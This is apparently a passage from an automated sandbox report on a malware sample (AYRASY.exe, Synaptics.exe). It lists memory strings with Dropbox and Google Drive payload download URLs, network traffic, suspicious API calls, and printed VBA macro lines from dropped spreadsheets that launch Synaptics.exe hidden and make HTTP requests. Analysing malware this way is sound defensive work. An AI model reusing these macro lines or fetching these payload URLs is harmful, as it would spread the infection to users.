                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/wnload?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userconten
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVG
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005557000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005578000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2338570644.000000000557A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000003.00000003.2337108577.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgineer
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrls
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrls(Z
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrlss
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                Source: AYRASY.exeString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: AYRASY.exeString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlL
                                Source: ~DFF3ADC856E5C0AEBE.TMP.4.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49786 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49805 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49804 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49813 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49816 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49845 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49852 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49853 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49858 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49859 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49867 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49913 version: TLS 1.2
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_001C7099
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_001C7294
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A07294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_00A07294
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_001C7099
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_001B4342
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_001DF5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_00A1F5D0

                                System Summary

                                barindex
                                Document contains an embedded VBA macro with suspicious strings
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Document contains an embedded VBA with functions possibly related to ADO stream file operations
                                Source: eLc9RiO7.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: PWCCAWLGRE.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Document contains an embedded VBA with functions possibly related to HTTP operations
                                Source: eLc9RiO7.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: PWCCAWLGRE.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                                Source: eLc9RiO7.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: PWCCAWLGRE.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_001729C2
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001E02AA NtdllDialogWndProc_W,2_2_001E02AA
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DE769 NtdllDialogWndProc_W,CallWindowProcW,2_2_001DE769
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DEA4E NtdllDialogWndProc_W,2_2_001DEA4E
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_001DEAA6
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018AC99 NtdllDialogWndProc_W,2_2_0018AC99
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_001DECBC
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018AD5C NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W,2_2_0018AD5C
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018AFB4 GetParent,NtdllDialogWndProc_W,2_2_0018AFB4
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_001DEFA8
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF0A1 SendMessageW,NtdllDialogWndProc_W,2_2_001DF0A1
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_001DF122
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF37C NtdllDialogWndProc_W,2_2_001DF37C
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF3AB NtdllDialogWndProc_W,2_2_001DF3AB
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF3DA NtdllDialogWndProc_W,2_2_001DF3DA
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF425 NtdllDialogWndProc_W,2_2_001DF425
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF45A ClientToScreen,NtdllDialogWndProc_W,2_2_001DF45A
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF594 GetWindowLongW,NtdllDialogWndProc_W,2_2_001DF594
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_001DF5D0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018B7F2 NtdllDialogWndProc_W,2_2_0018B7F2
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018B845 NtdllDialogWndProc_W,2_2_0018B845
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DFE80 NtdllDialogWndProc_W,2_2_001DFE80
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_001DFF04
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_001DFF91
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_009B29C2
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A202AA NtdllDialogWndProc_W,9_2_00A202AA
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1E769 NtdllDialogWndProc_W,CallWindowProcW,9_2_00A1E769
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,9_2_00A1EAA6
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1EA4E NtdllDialogWndProc_W,9_2_00A1EA4E
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CAC99 NtdllDialogWndProc_W,9_2_009CAC99
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_00A1ECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CAD5C NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W,9_2_009CAD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_00A1EFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CAFB4 GetParent,NtdllDialogWndProc_W,9_2_009CAFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F0A1 SendMessageW,NtdllDialogWndProc_W,9_2_00A1F0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_00A1F122
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F3AB NtdllDialogWndProc_W,9_2_00A1F3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F3DA NtdllDialogWndProc_W,9_2_00A1F3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F37C NtdllDialogWndProc_W,9_2_00A1F37C
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F425 NtdllDialogWndProc_W,9_2_00A1F425
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F45A ClientToScreen,NtdllDialogWndProc_W,9_2_00A1F45A
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F594 GetWindowLongW,NtdllDialogWndProc_W,9_2_00A1F594
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_00A1F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CB7F2 NtdllDialogWndProc_W,9_2_009CB7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CB845 NtdllDialogWndProc_W,9_2_009CB845
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1FE80 NtdllDialogWndProc_W,9_2_00A1FE80
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_00A1FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_00A1FF04
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B702F: CreateFileW,DeviceIoControl,CloseHandle,2_2_001B702F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001AB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BD5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_001AB9F1
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_001B82D0
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_009F82D0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001D30AD2_2_001D30AD
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001836802_2_00183680
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0017DCD02_2_0017DCD0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0017A0C02_2_0017A0C0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001901832_2_00190183
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B220C2_2_001B220C
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001785302_2_00178530
